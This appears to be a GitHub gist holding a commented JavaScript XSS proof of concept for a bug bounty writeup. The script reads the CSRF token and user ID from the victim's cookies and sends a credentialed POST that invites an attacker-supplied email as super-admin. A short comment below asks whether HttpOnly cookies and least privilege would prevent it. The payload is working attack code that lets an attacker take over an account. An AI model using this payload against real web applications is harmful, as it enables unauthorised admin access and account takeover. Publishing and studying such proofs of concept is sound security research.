-
-
Save Melotover/642d797ad890780b1aced8bde0acbffc to your computer and use it in GitHub Desktop.
for writeup!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var email = "ATTACKER_EMAIl"; | |
// Set the attacker email that we will receive the invitation to it. | |
var csrf= document.cookie.split('; ').find(row => row.startsWith('example-csrf')).split('=')[1]; | |
// Getting the csrf value from [example-csrf] cookie parameter and store it in the csrf variable. | |
var pid= document.cookie.split('; ').find(row => row.startsWith('USER_ID')).split('=')[1]; | |
// Getting the pid value from [USER_ID] cookie parameter and store it in the pid variable. | |
// Initiate the XHR POST request that holds the data we collect! | |
var http=new XMLHttpRequest(); | |
http.open('POST','https://api.example.com/app/v1/users/add/?Pid='+pid+'&clienttimeout=14000&app=users&version=1.0', true); | |
http.withCredentials=true; | |
// To send the victim cookies with the request! | |
http.setRequestHeader('X-example-CSRF',csrf); | |
http.setRequestHeader('Content-type','application/json'); | |
// Setting the required headers! | |
http.send('{"users":[{"email":"'+email+'" ,"emailSent":true,"firstName":"","lastName":"","roleNames":[],"jita":false,"expiresAt":null,"primaryTeamId":-1,"secondaryTeamIds":[],"partner":false,"pending":false,"existingInexample":false,"hasTwoFactorBackupCodes":false,"hasTwoFactorConfigured":false,"userAssetsCount":null,"scim":false}],"roleNames":["super-admin"],"teamId":null,"secondaryTeamIds":[],"sendWelcomeEmail":true,"forceWelcomeEmail":true}'); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
question does making a cookie "Secure; HttpOnly;"
like so:
prevent this by not allowing js access to the secured cookie
maybe??
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#restrict_access_to_cookies
note: im not sure if this is best UX as we want our developers to be able to easly obtain a token and use it to authenticate requests. Although in any practical secure environment they will be supplied as env variables sometimes you wish to manually authenticate a code
therefore you should then set the secure cookie yourself and forget about it to prevent possible xss token acess.
further you should limit the access of each user so that a token compromise is not impactful if possible. read only or 2 factor maybe??